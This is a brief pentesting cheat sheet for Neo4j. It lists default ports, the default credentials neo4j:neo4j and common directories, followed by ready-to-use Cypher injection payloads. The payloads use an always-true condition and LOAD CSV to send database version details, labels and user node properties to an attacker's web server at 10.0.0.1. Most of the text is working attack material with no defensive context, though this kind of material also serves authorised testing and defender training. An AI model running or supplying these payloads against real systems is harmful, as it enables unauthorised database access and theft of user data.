Neo4j Pentesting

Neo4j is a graph database management system developed by Neo4j. Default ports are 6362 (Backup), 7474 (HTTP), 7473 (HTTPS), 7687 (Bolt).

- https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j
- https://pentester.land/blog/cypher-injection-cheatsheet/

Default Credentials

neo4j:neo4j


Common Directories & Files in Local System

/var/lib/neo4j
/var/log/neo4j


Cypher Injection

Before injecting payloads, we need to start local web server to fetch the result of the query.

sudo python3 -m http.server 80

Below are payloads.

In some payloads, replace 10.0.0.1 with your ip address.

<!-- Get Neo4j version -->
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.0.0.1/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //

<!-- Get labels -->
' OR 1=1 WITH 1 as a  CALL db.labels() yield label LOAD CSV FROM 'http://10.0.0.1/?label='+label as l RETURN 0 as _0 //

<!-- Get properties of the key -->
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.0.1/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //